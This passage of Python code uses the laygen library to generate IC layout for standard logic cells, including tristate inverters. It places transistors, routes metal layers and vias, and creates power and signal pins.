endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0])) rb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # a0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0]), endstyle0="extend", endstyle1="extend") ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 0]), refinstname=in4.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, 
refpinname1='G0', refinstindex1=np.array([m*2 - 1, 0])) ra0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstname1=ip4.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', gridname=rg_m2m3) # internal connection between mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m*2 - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m*2): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m*2-1, 0]), gridname=rg_m1m2) # output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m*2-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, 
refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m*2-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m*2): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m - 1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m*2): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, 
refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m*2): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip4.name, refinstindex0=np.array([i, 0]), refinstname1=ip4.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip4.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # dummy gate if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([1, 2]), xy1=np.array([-1, 2]), gridname0=rg_m1m2, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[-1,0], refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[1,0], endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([1, 2]), xy1=np.array([-1, 2]), gridname0=rg_m1m2, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[-1,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[1,0], endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 2]), xy1=np.array([0, 2]), gridname0=rg_m1m2, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[0,0], 
refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 2]), xy1=np.array([0, 2]), gridname0=rg_m1m2, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([0, 0]), via0=[0,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 2]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=ip4_sp.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), via0=[0,0], refinstname1=ip4_sp.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]), via1=[0,0]) laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 2]), xy1=np.array([0, -1]), gridname0=rg_m2m3, refinstname0=ip1_sp.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), via0=[0,0], refinstname1=ip1_sp.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0]), via1=[0,0]) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd=laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss=laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['A', 'B', 'O'], rect_list=[ra0, rb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body, m=1, origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 
= routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin m=max(1, int(m/2)) #using nf=2 devices # placement in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix + 'N1', templatename = devname_nmos_body, gridname = pg, refinstname = in0.name, shape=np.array([m, 1])) in2 = laygen.relplace(name = "I" + objectname_pfix + 'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I" + objectname_pfix + 'N3', templatename = devname_nmos_boundary, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I"+objectname_pfix + 'N4', templatename = devname_nmos_body, gridname = pg, refinstname = in3.name, shape=np.array([m, 1])) in5 = laygen.relplace(name = "I"+objectname_pfix + 'N5', templatename = devname_nmos_boundary, gridname = pg, refinstname = in4.name) ip0 = laygen.relplace(name = "I"+objectname_pfix + 'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix + 'P1', templatename = devname_pmos_body, gridname = pg, refinstname = ip0.name, transform='MX', shape=np.array([m, 1])) ip2 = laygen.relplace(name = "I"+objectname_pfix + 'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I"+objectname_pfix + 'P4', templatename = devname_pmos_body, gridname = pg, refinstname = ip3.name, transform='MX', shape=np.array([m, 1])) ip5 = laygen.relplace(name = "I"+objectname_pfix + 'P5', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip4.name, transform='MX') # route # in0 for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), 
xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refpinname1='G0', refinstindex1=np.array([i, 0]), ) laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m == 1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 1]), xy1=np.array([1, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([-1, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in1.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='G0', refinstname1=in1.name, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='G0', gridname=rg_m2m3) # en0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", 
endstyle1="extend") ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([1, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=in4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([1, 0]), refinstname=in4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) # enb0 for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0]), endstyle0="extend", endstyle1="extend") renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) else: laygen.route(None, laygen.layers['metal'][2], 
xy0=np.array([0, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='G0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='G0', refinstindex1=np.array([m - 1, 0])) laygen.via(None, np.array([-1, 0]), refinstname=ip4.name, refpinname='G0', refinstindex=np.array([m - 1, 0]), gridname=rg_m2m3) # internal connection between stacked mos laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([0, 1]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip4.name, refpinname1='S1', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 1]), refinstname=in1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) #laygen.via(None, np.array([0, 1]), refinstname=ip1.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=in4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) 
laygen.via(None, np.array([0, 1]), refinstname=ip4.name, refpinname='S1', refinstindex=np.array([m-1, 0]), gridname=rg_m1m2) # mux output if m==1: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0]), endstyle0="extend", endstyle1="extend") else: laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=in4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip4.name, refpinname0='D0', refinstindex0=np.array([0, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m-1, 0])) ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in4.name, refpinname0='D0', refinstindex0=np.array([m - 1, 0]), refinstname1=ip4.name, refpinname1='D0', refinstindex1=np.array([m - 1, 0])) for i in range(m): laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', refinstindex=np.array([i, 0]), gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in4.name, refpinname='D0', gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) laygen.via(None, np.array([0, 0]), refinstname=ip4.name, refpinname='D0', 
gridname=rg_m2m3, refinstindex=np.array([m - 1, 0])) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s0 * np.array([1, 0]), xy1=xy_s0, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s0 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) xy_s1 = laygen.get_template_pin_xy(in1.cellname, 'S1', rg_m1m2)[0, :] for i in range(m): laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=in1.name, refinstindex0=np.array([i, 0]), refinstname1=in1.name, refinstindex1=np.array([i, 0])) laygen.route(None, laygen.layers['metal'][1], xy0=xy_s1 * np.array([1, 0]), xy1=xy_s1, gridname0=rg_m1m2, refinstname0=ip1.name, refinstindex0=np.array([i, 0]), refinstname1=ip1.name, refinstindex1=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=in1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) laygen.via(None, xy_s1 * np.array([1, 0]), refinstname=ip1.name, gridname=rg_m1m2, refinstindex=np.array([i, 0])) # power and groud rail xy = laygen.get_xy(obj = in5.template, gridname = rg_m1m2) * np.array([1, 0]) rvdd = laygen.route("R" + objectname_pfix + "VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, refinstname0=ip0.name, refinstname1=ip5.name) rvss = laygen.route("R" + objectname_pfix + "VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2, 
refinstname0=in0.name, refinstname1=in5.name) # pin if create_pin == True: create_io_pin(laygen, layer=laygen.layers['pin'][3], gridname=rg_m2m3_pin, pinname_list = ['I', 'EN', 'ENB', 'O'], rect_list=[ri0, ren0, renb0, ro0]) create_power_pin(laygen, layer=laygen.layers['pin'][2], gridname=rg_m1m2, rect_vdd=rvdd, rect_vss=rvss) def generate_tinv_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin, devname_nmos_boundary, devname_nmos_body_2stack, devname_nmos_space, devname_pmos_boundary, devname_pmos_body_2stack, devname_pmos_space, pin_i_abut="nmos", origin=np.array([0,0]), create_pin=False): pg = placement_grid rg_m1m2 = routing_grid_m1m2 rg_m2m3 = routing_grid_m2m3 rg_m1m2_pin = routing_grid_m1m2_pin rg_m2m3_pin = routing_grid_m2m3_pin # placement in0 = laygen.place("I"+objectname_pfix+'N0', devname_nmos_boundary, pg, xy=origin) in1 = laygen.relplace(name = "I"+objectname_pfix+'N1', templatename = devname_nmos_body_2stack, gridname = pg, refinstname = in0.name) in2 = laygen.relplace(name = "I"+objectname_pfix+'N2', templatename = devname_nmos_boundary, gridname = pg, refinstname = in1.name) in3 = laygen.relplace(name = "I"+objectname_pfix + 'N3', templatename = devname_nmos_space, gridname = pg, refinstname = in2.name) in4 = laygen.relplace(name = "I" + objectname_pfix + 'N4', templatename = devname_nmos_space, gridname = pg, refinstname = in3.name) ip0 = laygen.relplace(name = "I"+objectname_pfix+'P0', templatename = devname_pmos_boundary, gridname = pg, refinstname = in0.name, direction='top', transform='MX') ip1 = laygen.relplace(name = "I"+objectname_pfix+'P1', templatename = devname_pmos_body_2stack, gridname = pg, refinstname = ip0.name, transform='MX') ip2 = laygen.relplace(name = "I"+objectname_pfix+'P2', templatename = devname_pmos_boundary, gridname = pg, refinstname = ip1.name, transform='MX') ip3 = laygen.relplace(name = "I"+objectname_pfix + 'P3', templatename = 
devname_pmos_space, gridname = pg, refinstname = ip2.name, transform='MX') ip4 = laygen.relplace(name = "I" + objectname_pfix + 'P4', templatename = devname_pmos_space, gridname = pg, refinstname = ip3.name, transform='MX') # route # input if pin_i_abut == "nmos": refinstname_in = in1.name refinstname_en0 = in1.name refinstname_en1 = ip1.name else: refinstname_in = ip1.name refinstname_en0 = ip1.name refinstname_en1 = in1.name laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='G0', refinstname1=ip1.name, refpinname1='G0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 1]), xy1=np.array([2, 1]), gridname0=rg_m1m2, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0') ri0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 2]), gridname0=rg_m2m3, refinstname0=refinstname_in, refpinname0='G0', refinstname1=refinstname_in, refpinname1='G0', endstyle0="extend", endstyle1="extend") laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m1m2) laygen.via(None, np.array([0, 1]), refinstname=refinstname_in, refpinname='G0', gridname=rg_m2m3) # en laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-1, 0]), xy1=np.array([1, 0]), gridname0=rg_m1m2, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') ren0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([1, 0]), xy1=np.array([1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en0, refpinname0='G1', refinstname1=refinstname_en0, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en0, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([1, 0]), refinstname=in1.name, refpinname='G1', gridname=rg_m2m3) # enb laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0+1, 0]), 
gridname0=rg_m1m2, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') renb0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([-1, 0]), xy1=np.array([-1, 2]), gridname0=rg_m2m3, refinstname0=refinstname_en1, refpinname0='G1', refinstname1=refinstname_en1, refpinname1='G1') laygen.via(None, np.array([0, 0]), refinstname=refinstname_en1, refpinname='G1', gridname=rg_m1m2) laygen.via(None, np.array([-1, 0]), refinstname=ip1.name, refpinname='G1', gridname=rg_m2m3) # output laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=in1.name, refpinname1='D0') laygen.route(None, laygen.layers['metal'][2], xy0=np.array([-2, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=ip1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') ro0 = laygen.route(None, laygen.layers['metal'][3], xy0=np.array([0, 0]), xy1=np.array([0, 0]), gridname0=rg_m2m3, refinstname0=in1.name, refpinname0='D0', refinstname1=ip1.name, refpinname1='D0') laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m1m2) laygen.via(None, np.array([0, 0]), refinstname=in1.name, refpinname='D0', gridname=rg_m2m3) laygen.via(None, np.array([0, 0]), refinstname=ip1.name, refpinname='D0', gridname=rg_m2m3) # power and ground route xy_s0 = laygen.get_template_pin_xy(in1.cellname, 'S0', rg_m1m2)[0, :] laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=in1.name, refpinname0='S0', refinstname1=in1.name) laygen.route(None, laygen.layers['metal'][1], xy0=np.array([0, 0]), xy1=xy_s0 * np.array([1, 0]), gridname0=rg_m1m2, refinstname0=ip1.name, refpinname0='S0', refinstname1=ip1.name) laygen.via(None, xy_s0 * np.array([1, 0]), 
